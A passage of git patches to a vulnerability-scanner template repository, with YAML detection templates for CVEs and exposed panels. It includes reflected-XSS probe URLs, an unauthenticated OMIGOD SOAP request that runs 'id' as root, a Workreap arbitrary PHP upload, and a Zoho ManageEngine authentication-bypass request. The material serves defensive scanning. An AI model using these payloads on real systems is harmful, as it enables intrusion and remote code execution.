"{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 40b630e5cd8196d7350a259b654151bb053bfdf9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 Sep 2021 10:50:34 +0000 Subject: [PATCH 2293/4083] Auto Generated CVE annotations [Wed Sep 15 10:50:34 UTC 2021] :robot: --- cves/2021/CVE-2021-24342.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml index 6a8299a894..dccaee5040 100644 --- a/cves/2021/CVE-2021-24342.yaml +++ b/cves/2021/CVE-2021-24342.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 tags: cves,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24342 + cwe-id: CWE-79 requests: - raw: From 86a369132ede3f59e595b606ff49d940f9dfa16d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 16:49:18 +0530 Subject: [PATCH 2294/4083] Update CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index 6978460d19..c406a00d11 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -1,4 +1,3 @@ - id: CVE-2020-24912 info: @@ -10,7 +9,7 @@ info: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - - http://seclists.org/fulldisclosure/2021/Mar/30 + - http://seclists.org/fulldisclosure/2021/Mar/30 tags: cves,cve2020,qcubed,xss requests: From bc1d5674551181f925bc741aed6a7fa523c0df1a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 16:50:33 +0530 Subject: [PATCH 2295/4083] Update CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index c406a00d11..1e3633256c 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - http://seclists.org/fulldisclosure/2021/Mar/30 tags: cves,cve2020,qcubed,xss From 781f09984834ff1ff5eb6b4f24dfdb2f012d6cab Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 16:57:27 +0530 Subject: [PATCH 2296/4083] Create getsimple-installation.yaml --- exposed-panels/getsimple-installation.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/getsimple-installation.yaml diff --git a/exposed-panels/getsimple-installation.yaml b/exposed-panels/getsimple-installation.yaml new file mode 100644 index 0000000000..273493ca04 --- /dev/null +++ b/exposed-panels/getsimple-installation.yaml @@ -0,0 +1,25 @@ +id: getsimple-installation + +info: + name: GetSimple CMS Installation + author: princechaddha + severity: high + reference: http://get-simple.info/ + tags: getsimple,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/install.php" + + matchers-condition: and + matchers: + - type: word + words: + - "GetSimple » Installation" + - "PHP Version" + condition: and + + - type: status + status: + - 200 From 8d74383b0c13812a2e812d6cd5a8292c6d951e1c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:00:00 +0530 Subject: [PATCH 2297/4083] Update getsimple-cms-detect.yaml --- technologies/getsimple-cms-detect.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/technologies/getsimple-cms-detect.yaml b/technologies/getsimple-cms-detect.yaml index 175287a663..931a074037 100644 --- a/technologies/getsimple-cms-detect.yaml +++ b/technologies/getsimple-cms-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/admin/index.php" + - "{{BaseURL}}" matchers-condition: and matchers: @@ -19,4 +19,5 @@ requests: - type: word words: - - "GetSimple CMS" + - "Powered by GetSimple" + part: body From 68cdcd3034ec1c98965ff2b73dcf652a17d4e903 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:20:24 +0530 Subject: [PATCH 2298/4083] Update CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index 1e3633256c..26baa66321 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -4,7 +4,7 @@ info: name: QCube Cross-Site-Scripting author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + description: A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. reference: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 @@ -26,8 +26,7 @@ requests: - type: word words: - - 'strProfileData' - - "YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + - "" part: body - type: word From 18534fa69212b240626fe1c35e5ac83fbd7a7e9a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 Sep 2021 11:53:20 +0000 Subject: [PATCH 2299/4083] Auto Generated CVE annotations [Wed Sep 15 11:53:20 UTC 2021] :robot: --- cves/2020/CVE-2020-24912.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index 26baa66321..d4d917d90d 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - http://seclists.org/fulldisclosure/2021/Mar/30 tags: cves,cve2020,qcubed,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24912 + cwe-id: CWE-79 requests: - method: POST From 6539892061287c382028fcb6edbe6fb386112122 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:24:42 +0530 Subject: [PATCH 2300/4083] Update CVE-2020-28351.yaml --- cves/2020/CVE-2020-28351.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml index e83c29aa1b..d759a88588 100644 --- a/cves/2020/CVE-2020-28351.yaml +++ b/cves/2020/CVE-2020-28351.yaml @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME" + - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" headers: Content-Type: application/x-www-form-urlencoded @@ -22,7 +22,7 @@ requests: - type: word words: - - 'onmouseover=alert(document.domain)' + - '' part: body - type: word From 19bbdef5397f2e1db3cabd6a4413750b78288972 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:29:47 +0530 Subject: [PATCH 2301/4083] Update CVE-2016-1000141.yaml --- cves/2016/CVE-2016-1000141.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml index c02f8e592a..2d67f13122 100644 --- a/cves/2016/CVE-2016-1000141.yaml +++ b/cves/2016/CVE-2016-1000141.yaml @@ -1,22 +1,23 @@ id: CVE-2016-1000141 info: - name: MiniMax <= 2.0.2 - Reflected Cross-Site Scripting (XSS) + name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 9e090c8098e865a9fa3d55232115e982faa4d305 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:32:32 +0530 Subject: [PATCH 2302/4083] Update CVE-2019-13392.yaml --- cves/2019/CVE-2019-13392.yaml | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml index 6f097447c2..fe641a6446 100644 --- a/cves/2019/CVE-2019-13392.yaml +++ b/cves/2019/CVE-2019-13392.yaml @@ -18,21 +18,17 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - recipient=%3cscript%3ealert(document.domain)%3c%2fscript%3e + recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header - - - type: status - status: - - 200 + words: + - text/html From f19daba61699aa43244960bfd4c6ac4c94b9ce4e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 Sep 2021 12:04:47 +0000 Subject: [PATCH 2303/4083] Auto Generated CVE annotations [Wed Sep 15 12:04:47 UTC 2021] :robot: --- cves/2016/CVE-2016-1000141.yaml | 5 +++++ cves/2020/CVE-2020-28351.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml index 2d67f13122..6450289e6c 100644 --- a/cves/2016/CVE-2016-1000141.yaml +++ b/cves/2016/CVE-2016-1000141.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000141 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml index d759a88588..11a660996c 100644 --- a/cves/2020/CVE-2020-28351.yaml +++ b/cves/2020/CVE-2020-28351.yaml @@ -9,6 +9,11 @@ info: - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 tags: cves,cve2020,shoretel,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-28351 + cwe-id: CWE-79 requests: - method: GET From 46201a340ba582fe94b100bd2a6acb8522f8f84a Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 15 Sep 2021 19:52:49 +0530 Subject: [PATCH 2304/4083] duplicate template --- technologies/minio-detect.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 technologies/minio-detect.yaml diff --git a/technologies/minio-detect.yaml b/technologies/minio-detect.yaml deleted file mode 100644 index aab5ca4231..0000000000 --- a/technologies/minio-detect.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: minio-detect - -info: - name: Minio Detection - author: pdteam - severity: info - tags: tech,minio - -requests: - - method: GET - path: - - "{{BaseURL}}/minio/login" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "MinIO Browser" \ No newline at end of file From 03aa89e4de33174f1032fdd4cffa3ddb1b2a291c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 15 Sep 2021 23:10:58 +0700 Subject: [PATCH 2305/4083] Create CVE-2021-38647.yaml --- cves/2021/CVE-2021-38647.yaml | 57 +++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 cves/2021/CVE-2021-38647.yaml diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml new file mode 100644 index 0000000000..4c499f0b8a --- /dev/null +++ b/cves/2021/CVE-2021-38647.yaml @@ -0,0 +1,57 @@ +id: CVE-2021-38647 + +info: + name: Open Management Infrastructure Remote Code Execution Vulnerability + author: daffainfo + severity: critical + tags: cve,cve2021,rce,omi + reference: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 + +requests: + + - raw: + - | + POST /wsman HTTP/1.1 + Connection: Keep-Alive + Content-Length: 1505 + Content-Type: application/soap+xml;charset=UTF-8 + Host: {{Hostname}} + + + + HTTP://192.168.1.1:5986/wsman/ + http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem + + http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous + + http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand + 102400 + uuid:0AB58087-C2C3-0005-0000-000000010000 + PT1M30S + + + + + root/scx + + + + + id + 0 + + + + + matchers-condition: and + matchers: + - type: word + words: + - "uid=0(root) gid=0(root) groups=0(root)" + part: body + + - type: status + status: + - 200 From f168c83b4405f4d18d870d6072757aef200da1b1 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 15 Sep 2021 23:16:39 +0700 Subject: [PATCH 2306/4083] Update CVE-2021-38647.yaml --- cves/2021/CVE-2021-38647.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index 4c499f0b8a..db7f42b46b 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -21,7 +21,7 @@ requests: - HTTP://192.168.1.1:5986/wsman/ + HTTP://{{Hostname}}{{Path}}/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous From a7fbdb10ae62029d086c556d4585bc8112b0c89a Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 15 Sep 2021 22:00:09 +0530 Subject: [PATCH 2307/4083] misc update - WIP --- cves/2021/CVE-2021-38647.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index db7f42b46b..6facae24aa 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -1,13 +1,15 @@ id: CVE-2021-38647 info: - name: Open Management Infrastructure Remote Code Execution Vulnerability + name: OMIGOD - Open Management Infrastructure RCE author: daffainfo severity: critical tags: cve,cve2021,rce,omi reference: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 + - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 + - https://github.com/microsoft/omi requests: @@ -21,7 +23,7 @@ requests: - HTTP://{{Hostname}}{{Path}}/ + {{BaseURL}}/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous From e0cacf21df1486a70eaadf6f543e8a0214fadef1 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 16 Sep 2021 08:07:40 +0700 Subject: [PATCH 2308/4083] Create CVE-2021-24499.yaml --- cves/2021/CVE-2021-24499.yaml | 48 +++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 cves/2021/CVE-2021-24499.yaml diff --git a/cves/2021/CVE-2021-24499.yaml b/cves/2021/CVE-2021-24499.yaml new file mode 100644 index 0000000000..0e7316599c --- /dev/null +++ b/cves/2021/CVE-2021-24499.yaml @@ -0,0 +1,48 @@ +id: CVE-2021-24499 + +info: + name: Workreap WordPress theme - unauthenticated RCE + author: daffainfo + severity: critical + description: The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts. + reference: https://github.com/RyouYoo/CVE-2021-24499 + tags: cve,cve2021,wordpress,wp-plugin,rce + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9 + X-Requested-With: XMLHttpRequest + + -----------------------------cd0dc6bdc00b1cf9 + Content-Disposition: form-data; name="action" + + workreap_award_temp_file_uploader + -----------------------------cd0dc6bdc00b1cf9 + Content-Disposition: form-data; name="award_img"; filename="cve2021.php" + Content-Type: application/x-httpd-php + + + -----------------------------cd0dc6bdc00b1cf9-- + + - | + GET /wp-content/uploads/workreap-temp/cve2021.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "CVE-2021-24499" + + - type: word + part: header + words: + - "text/plain" From df64158ca6f9348c76ced1f86d01d03d8f1ebc88 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 10:35:05 +0700 Subject: [PATCH 2309/4083] Create CVE-2019-7543.yaml --- cves/2019/CVE-2019-7543.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2019/CVE-2019-7543.yaml diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml new file mode 100644 index 0000000000..a3c1d32ec5 --- /dev/null +++ b/cves/2019/CVE-2019-7543.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-7543 + +info: + name: KindEditor 4.1.11, the php/demo.php - (XSS) + author: pikpikcu + severity: medium + description: KindEditor 4.1.11, the php/demo.php content1 parameter has a reflected Cross-site Scripting (XSS) vulnerability. + reference: + - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor + - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 + tags: cves,cve2019,kindeditor,xss + +requests: + - method: POST + path: + - '{{BaseURL}/kindeditor/php/demo.php' + headers: + Content-Type: application/x-www-form-urlencoded + + body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html From f9fa1b75b33866a826c7e42d22874a00eedc6467 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 10:51:42 +0700 Subject: [PATCH 2310/4083] Create php-proxy-detect.yaml --- technologies/php-proxy-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/php-proxy-detect.yaml diff --git a/technologies/php-proxy-detect.yaml b/technologies/php-proxy-detect.yaml new file mode 100644 index 0000000000..bd3e98a6fd --- /dev/null +++ b/technologies/php-proxy-detect.yaml @@ -0,0 +1,25 @@ +id: php-proxy-detect + +info: + name: PHP Proxy Detect + author: pikpikcu + severity: info + tags: tech,php + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/proxy" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "PHP-Proxy" + + - type: status + status: + - 200 From 20cddde737901c2beb5526d568cf1272c58ba1a3 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:01:39 +0700 Subject: [PATCH 2311/4083] Create CVE-2016-8527.yaml --- cves/2016/CVE-2016-8527.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2016/CVE-2016-8527.yaml diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml new file mode 100644 index 0000000000..2e88470258 --- /dev/null +++ b/cves/2016/CVE-2016-8527.yaml @@ -0,0 +1,33 @@ +id: CVE-2016-8527 + +info: + name: Aruba Airwave - (XSS) + author: pikpikcu + severity: medium + description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). + reference: + - https://www.exploit-db.com/exploits/41482 + - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 + tags: cves,cve2016,aruba,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(document.domain)'%2f%3e%3c%2fa%3e&end=500&match" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - 'Content-Type: text/html' + part: header From 3e2c882d84a8f90417fc55379f6c16bcafb1b6cd Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:07:34 +0700 Subject: [PATCH 2312/4083] Create CVE-2021-40539.yaml --- cves/2021/CVE-2021-40539.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-40539.yaml diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml new file mode 100644 index 0000000000..2c5dbfd0b1 --- /dev/null +++ b/cves/2021/CVE-2021-40539.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-40539 + +info: + name: Zoho ManageEngine ADSelfService Plus version 6113 Unauthenticated RCE + author: daffainfo + severity: critical + description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. + tags: cve,cve2021,rce,zoho + reference: + - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 + +requests: + + - raw: + - | + POST /RestAPI/LogonCustomization HTTP/1.1 + Host: 172.16.57.9 + Content-Type: application/x-www-form-urlencoded + Content-Length: 27 + + methodToCall=previewMobLogo + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 From cd4eff06ecb637615a8cd08e21b249acb48137cc Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:18:34 +0700 Subject: [PATCH 2313/4083] Create gitea-detect.yaml --- technologies/gitea-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/gitea-detect.yaml diff --git a/technologies/gitea-detect.yaml b/technologies/gitea-detect.yaml new file mode 100644 index 0000000000..e17960b43a --- /dev/null +++ b/technologies/gitea-detect.yaml @@ -0,0 +1,25 @@ +id: gitea-detect + +info: + name: Gitea Detect + author: pikpikcu + severity: info + tags: tech,gitea + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/user/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Powered by Gitea" + + - type: status + status: + - 200 From 57bdb750542a5c3bb991dd010f6e0f128ab6a49c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:34:31 +0700 Subject: [PATCH 2314/4083] Create elfinder-detect.yaml --- technologies/elfinder-detect.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/elfinder-detect.yaml diff --git a/technologies/elfinder-detect.yaml b/technologies/elfinder-detect.yaml new file mode 100644 index 0000000000..53e207dae4 --- /dev/null +++ b/technologies/elfinder-detect.yaml @@ -0,0 +1,26 @@ +id: elfinder-detect + +info: + name: elFinder Detect + author: pikpikcu + severity: info + tags: tech,elfinder + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/php/connector.minimal.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "" + - '{"error":["errUnknownCmd"]}' + + - type: status + status: + - 200 From da9e13223267f1591a6532a6f7e6cf5e230c1966 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 16 Sep 2021 16:10:20 +0700 Subject: [PATCH 2315/4083] Update CVE-2021-40539.yaml --- cves/2021/CVE-2021-40539.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index 2c5dbfd0b1..99127daa41 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -15,7 +15,7 @@ requests: - raw: - | POST /RestAPI/LogonCustomization HTTP/1.1 - Host: 172.16.57.9 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Content-Length: 27 From 58697d30dc76d09962b92d048df1a4996e54af34 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 16 Sep 2021 15:09:33 +0530 Subject: [PATCH 2316/4083] Update azure-takeover-detection.yaml --- dns/azure-takeover-detection.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 67bee6345b..c3191cdd0a 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -44,6 +44,7 @@ dns: - type: word words: - "NXDOMAIN" + extractors: - type: regex group: 1 From 279d0234ac80169eaa3e00a1163a6bedb55a1d24 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 17:27:49 +0530 Subject: [PATCH 2317/4083] Update dir-listing.yaml --- miscellaneous/dir-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/miscellaneous/dir-listing.yaml b/miscellaneous/dir-listing.yaml index 15c5c11756..18562b5341 100644 --- a/miscellaneous/dir-listing.yaml +++ b/miscellaneous/dir-listing.yaml @@ -4,6 +4,7 @@ info: name: Directory listing enabled author: _harleo,pentest_swissky severity: info + reference: https://portswigger.net/kb/issues/00600100_directory-listing tags: misc,generic requests: From 47433f207b0ed4f20f5d43257846515b952b8bcd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 17:33:13 +0530 Subject: [PATCH 2318/4083] Update elfinder-detect.yaml --- technologies/elfinder-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/elfinder-detect.yaml b/technologies/elfinder-detect.yaml index 53e207dae4..4b2dbbccc8 100644 --- a/technologies/elfinder-detect.yaml +++ b/technologies/elfinder-detect.yaml @@ -10,8 +10,9 @@ requests: - method: GET path: - "{{BaseURL}}" - - "{{BaseURL}}/php/connector.minimal.php" + - "{{BaseURL}}/elfinder.html" + stop-at-first-match: true matchers-condition: and matchers: @@ -19,7 +20,6 @@ requests: part: body words: - "" - - '{"error":["errUnknownCmd"]}' - type: status status: From 47b99dc20d9df165521996858b482afd17a8f8bd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 17:43:04 +0530 Subject: [PATCH 2319/4083] Update gitea-detect.yaml --- technologies/gitea-detect.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/technologies/gitea-detect.yaml b/technologies/gitea-detect.yaml index e17960b43a..965db9b3eb 100644 --- 